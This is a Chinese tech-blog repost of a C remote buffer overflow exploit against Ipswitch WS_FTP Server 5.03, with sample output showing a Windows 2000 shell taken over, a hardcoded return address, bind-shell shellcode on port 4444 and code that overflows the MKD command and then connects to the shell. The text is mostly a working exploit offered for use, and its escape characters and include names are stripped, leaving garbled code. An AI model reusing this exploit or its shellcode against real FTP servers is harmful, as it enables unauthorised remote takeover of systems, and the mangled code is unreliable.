ITPub博客

首页 > IT基础架构 > 网络安全 > WS_FTP Server v5.03 Remote buffer overflow Exploit

WS_FTP Server v5.03 Remote buffer overflow Exploit

原创 网络安全 作者:coolwinds 时间:2004-12-02 14:21:15 0 删除 编辑
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)

*/
[@more@]代码:
*/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define PORT 21
#define RPORT 4444
#define RET "x53x9Bx2Ex7C" /*win2k sp4*/

char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xb1xbe"
"x94x1dx83xebxfcxe2xf4x4dx56xc2x1dxb1xbexc7x48xe7"
"xe9x1fx71x95xa6x1fx58x8dx35xc0x18xc9xbfx7ex96xfb"
"xa6x1fx47x91xbfx7fxfex83xf7x1fx29x3axbfx7ax2cx4e"
"x42xa5xddx1dx86x74x69xb6x7fx5bx10xb0x79x7fxefx8a"
"xc2xb0x09xc4x5fx1fx47x95xbfx7fx7bx3axb2xdfx96xeb"
"xa2x95xf6x3axbax1fx1cx59x55x96x2cx71xe1xcax40xea"
"x7cx9cx1dxefxd4xa4x44xd5x35x8dx96xeaxb2x1fx46xad"
"x35x8fx96xeaxb6xc7x75x3fxf0x9axf1x4ex68x1dxdax30"
"x52x94x1cxb1xbexc3x4bxe2x37x71xf5x96xbex94x1dx21"
"xbfx94x1dx07xa7x8cxfax15xa7xe4xf4x54xf7x12x54x15"
"xa4xe4xdax15x13xbaxf4x68xb7x61xb0x7ax53x68x26xe6"
"xedxa6x42x82x8cx94x46x3cxf5xb4x4cx4ex69x1dxc2x38"
"x7dx19x68xa5xd4x93x44xe0xedx6bx29x3ex41xc1x19xe8"
"x37x90x93x53x4cxbfx3axe5x41xa3xe2xe4x8exa5xddxe1"
"xeexc4x4dxf1xeexd4x4dx4exebxb8x94x76x8fx4fx4exe2"
"xd6x96x1dxa0xe2x1dxfdxdbxaexc4x4ax4exebxb0x4exe6"
"x41xc1x35xe2xeaxc3xe2xe4x9ex1dxdaxd9xfdxd9x59xb1"
"x37x77x9ax4bx8fx54x90xcdx9ax38x77xa4xe7x67xb6x36"
"x44x17xf1xe5x78xd0x39xa1xfaxf2xdaxf5x9axa8x1cxb0"
"x37xe8x39xf9x37xe8x39xfdx37xe8x39xe1x33xd0x39xa1"
"xeaxc4x4cxe0xefxd5x4cxf8xefxc5x4exe0x41xe1x1dxd9"
"xccx6axaexa7x41xc1x19x4ex6ex1dxfbx4excbx94x75x1c"
"x67x91xd3x4exebx90x94x72xd4x6bxe2x87x41x47xe2xc4"
"xbexfcxedx3bxbaxcbxe2xe4xbaxa5xc6xe2x41x44x1d";

struct sockaddr_in hrm;

void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024];
 int n;

 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }

  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock);
}

int conn(char *ip,int p)
{
    int sockfd;
    hrm.sin_family = AF_INET;
    hrm.sin_addr.s_addr = inet_addr(ip);
    hrm.sin_port = htons(p);
    bzero(&(hrm.sin_zero),8);
    sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0)
    {
        perror("connect");
        exit(0);
    }

    printf("[x] Connected to: %s on port %d.n",ip,p);

    return sockfd;
}

int main(int argc, char *argv[])
{
    printf("***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***n");
    if(argc<4)
    {
        fprintf(stderr,"Usage: IP USER PASSn");
        exit(0);
    }

    char *buffer=malloc(954),*A=malloc(519),*B=malloc(32),*target=argv[1],*user=malloc(32),
    *pass=malloc(32),*request=malloc(32);
    int x,y;
    memset(request,',32);
    memset(user,',32);
    memset(pass,',32);
    memset(buffer,',954);
    memset(A,0x41,519);
    memset(B,0x42,32);
    
    strcpy(user,argv[2]);
    strcpy(pass,argv[3]);
    
    strcat(buffer,A);
    strcat(buffer,RET);
    strcat(buffer,B);
    strcat(buffer,shellcode);

    sprintf(request,"USER %srnPASS %srn",user,pass);

    x = conn(target,PORT);    
    printf("[x] Sending Login..");
    write(x,request,strlen(request));
    printf("done.n");
    sleep(2);
    
    printf("[x] Sending bad code..");
    write(x,"MKD ",4);
    write(x,buffer,954);
    write(x,"rn",2);
    printf("done.n");
    sleep(2);
    close(x);
    printf("[x] Checking if exploitation was successful..n");
    y=conn(target,RPORT);
    printf("[x] 0wn3d!nn");
    shell(y);
    close(y);    
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-782986/,如需转载,请注明出处,否则将追究法律责任。

下一篇: php
请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    951146